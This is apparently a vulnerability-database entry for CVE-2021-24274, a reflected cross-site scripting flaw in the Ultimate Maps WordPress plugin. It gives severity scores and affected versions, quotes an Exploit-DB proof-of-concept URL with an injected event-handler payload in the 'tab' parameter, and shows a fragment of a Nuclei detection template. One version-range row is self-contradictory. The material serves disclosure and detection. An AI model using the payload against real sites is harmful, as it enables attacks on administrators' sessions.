CVE-2021-24274
Published 2021-05-05
Priority: P3 · 45 · medium · CVSS 3.1 score 6.1
Vector: AV:N / AC:L / PR:N / UI:R / S:C / C:L / I:L / A:N
Tags: EXPLOIT
EPSS: 17.64% (96.8th percentile)
The Ultimate Maps by Supsystic WordPress plugin before 1.2.5 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| supsystic | ultimate_maps | < 1.2.5 | 1.2.5 |
| supsystic | ultimate_maps_by_supsystic | >= 1.2.5 < 1.2.5 | 1.2.5 |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 6.1 | MEDIUM | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
| nvd | 2.0 | 4.3 | MEDIUM | AV:N/AC:M/Au:N/C:N/I:P/A:N |
No detection rules found.
Exploit-DB
WordPress Plugin Ultimate Maps 1.2.4 - Reflected Cross-Site Scripting (XSS)
exploitdb · 2021-09-28 · CVSS 6.1 · CVE-2021-24274 [MEDIUM]
---
# Exploit Title: WordPress Plugin Ultimate Maps 1.2.4 - Reflected Cross-Site Scripting (XSS)
# Date: 3/28/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/ultimate-maps-by-supsystic/
# Version: 1.2.4
# Tested on: Windows 10
# CVE: CVE-2021-24274
1. Description:
The plugin did not sanitize the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
2. Proof of Concept:
/wp-admin/admin.php?page=ultimate-maps-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
Nuclei
WordPress Supsystic Ultimate Maps <1.2.5 - Cross-Site Scripting
nuclei · CVSS 6.1 · CVE-2021-24274 [MEDIUM]
```yaml
- type: word
  part: header
  words:
    - "text/html"
- type: status
  status:
    - 200
# digest: 4a0a00473045022074aadbb05e2aa65cb1d51deb9d96447635cde7e62b1780bb4d3ec936c8877295022100f833376ea9715a3e946b9cb050b51eb0e7c17943037e087ffe3a48a465715c68:922c64590222798bb761d5b6d8e72950
```
No writeups or analysis indexed.
- http://packetstormsecurity.com/files/164316/WordPress-Ultimate-Maps-1.2.4-Cross-Site-Scripting.html
- https://wpscan.com/vulnerability/200a3031-7c42-4189-96b1-bed9e0ab7c1d